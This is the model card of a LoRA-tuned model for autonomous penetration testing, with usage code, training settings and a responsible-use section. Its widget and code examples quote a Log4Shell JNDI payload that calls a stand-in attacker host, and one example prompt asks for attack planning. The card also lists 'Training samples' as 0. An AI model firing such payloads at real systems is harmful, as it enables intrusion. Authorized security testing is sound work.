---
base_model: Qwen/Qwen2.5-7B-Instruct
library_name: peft
license: apache-2.0
pipeline_tag: text-generation
tags:
- security
- pentesting
- cybersecurity
- lora
- peft
- qwen2.5
- vext
- vulnerability-detection
- red-team
- infosec
- autonomous-agents
datasets:
- custom
language:
- en
widget:
- text: "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${{jndi:ldap://attacker.com/a}}"
  example_title: Vulnerability Analysis
- text: "nmap -sV scan output:\n22/tcp open ssh OpenSSH 8.2p1\n80/tcp open http Apache httpd 2.4.41\n443/tcp open ssl/http nginx 1.18.0\n3306/tcp open mysql MySQL 5.7.32"
  example_title: Port Scan Analysis
- text: "Given the following reconnaissance data, plan the next attack steps:\nTarget: testapp.example.com\nOpen ports: 80, 443, 8080\nTechnologies: PHP 7.4, MySQL 5.7, Apache 2.4\nDirectories found: /admin, /api/v1, /uploads"
  example_title: Attack Planning
model-index:
- name: vext-pentest-7b
  results:
  - task:
      type: text-generation
      name: Autonomous Penetration Testing
    dataset:
      name: VEXT Security Testing Data
      type: custom
    metrics:
    - name: Validated Findings (True Positives)
      type: custom
      value: 139
    - name: Total Findings Generated
      type: custom
      value: 1977
    - name: Unique Vulnerability Types
      type: custom
      value: 77
    - name: OWASP Categories Covered
      type: custom
      value: 8
    - name: Autonomous Runs
      type: custom
      value: 306
---

# vext-pentest-7b

A security-specialized language model by **VEXT Labs Inc** for autonomous penetration testing and vulnerability assessment.

Built as a LoRA adapter on [Qwen/Qwen2.5-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-7B-Instruct), fine-tuned on real-world security testing data including tool output interpretation, attack planning, vulnerability classification, and remediation guidance.

## What This Model Does

vext-pentest-7b is trained to:

- **Interpret security tool output** — Parse and reason about results from nuclei, dalfox, sqlmap, gobuster, naabu, and 20+ other security tools
- **Plan attack strategies** — Given a target scope and reconnaissance data, decide which tools to run and in what order
- **Classify vulnerabilities** — Distinguish true positives from false positives with high accuracy
- **Generate remediation advice** — Provide actionable fix recommendations for discovered vulnerabilities

## Usage

### With vLLM (Recommended for Production)

```bash
# Start vLLM with LoRA support
python -m vllm.entrypoints.openai.api_server \
    --model Qwen/Qwen2.5-7B-Instruct \
    --enable-lora \
    --lora-modules vext-pentest-7b=/path/to/adapter \
    --max-lora-rank 32
```

### With PEFT + Transformers

```python
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2.5-7B-Instruct", torch_dtype="auto", device_map="auto")
model = PeftModel.from_pretrained(base, "VextLabs/vext-pentest-7b")
tokenizer = AutoTokenizer.from_pretrained("VextLabs/vext-pentest-7b")

messages = [
    {"role": "system", "content": "You are a security testing agent. Analyze the following tool output and identify vulnerabilities."},
    {"role": "user", "content": "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${jndi:ldap://attacker.com/a}"}
]

text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(text, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=512)
print(tokenizer.decode(output[0], skip_special_tokens=True))
```

## Training Details

| Parameter | Value |
|-----------|-------|
| Base model | `Qwen/Qwen2.5-7B-Instruct` |
| Method | LoRA (Low-Rank Adaptation) |
| Rank | 32 |
| Alpha | 64 |
| Target modules | `k_proj, v_proj, q_proj, down_proj, o_proj, gate_proj, up_proj` |
| Training steps | 5,000 |
| Training samples | 0 |
| Final loss | 0.5114268112182617 |
| Precision | bfloat16 |

### Training Data

Fine-tuned on proprietary security testing data generated by the VEXT platform, including:

- Tool execution traces (input parameters, raw output, parsed results)
- Attack planning decisions (which tool to use, why, expected outcomes)
- Vulnerability validation (true positive vs false positive classification)
- Multi-step attack chains (reconnaissance → enumeration → exploitation)

Data was collected from authorized testing against intentionally vulnerable applications (OWASP Juice Shop, DVWA, bWAPP, WebGoat, and others) and authorized bug bounty targets.

## Responsible Use

This model is intended for **authorized security testing only**. It should be used:

- Within the scope of authorized penetration testing engagements
- Against applications you own or have explicit permission to test
- In CTF (Capture the Flag) competitions and security training environments
- For defensive security research and vulnerability assessment

**Do not use this model for unauthorized access to computer systems.**

## About VEXT Labs Inc

VEXT Labs is building autonomous security testing agents that combine LLM reasoning with real security tools. Our agents run full penetration tests — from reconnaissance to exploitation to reporting — with human-level decision making.

Learn more at [tryvext.com](https://tryvext.com)

## License

Apache 2.0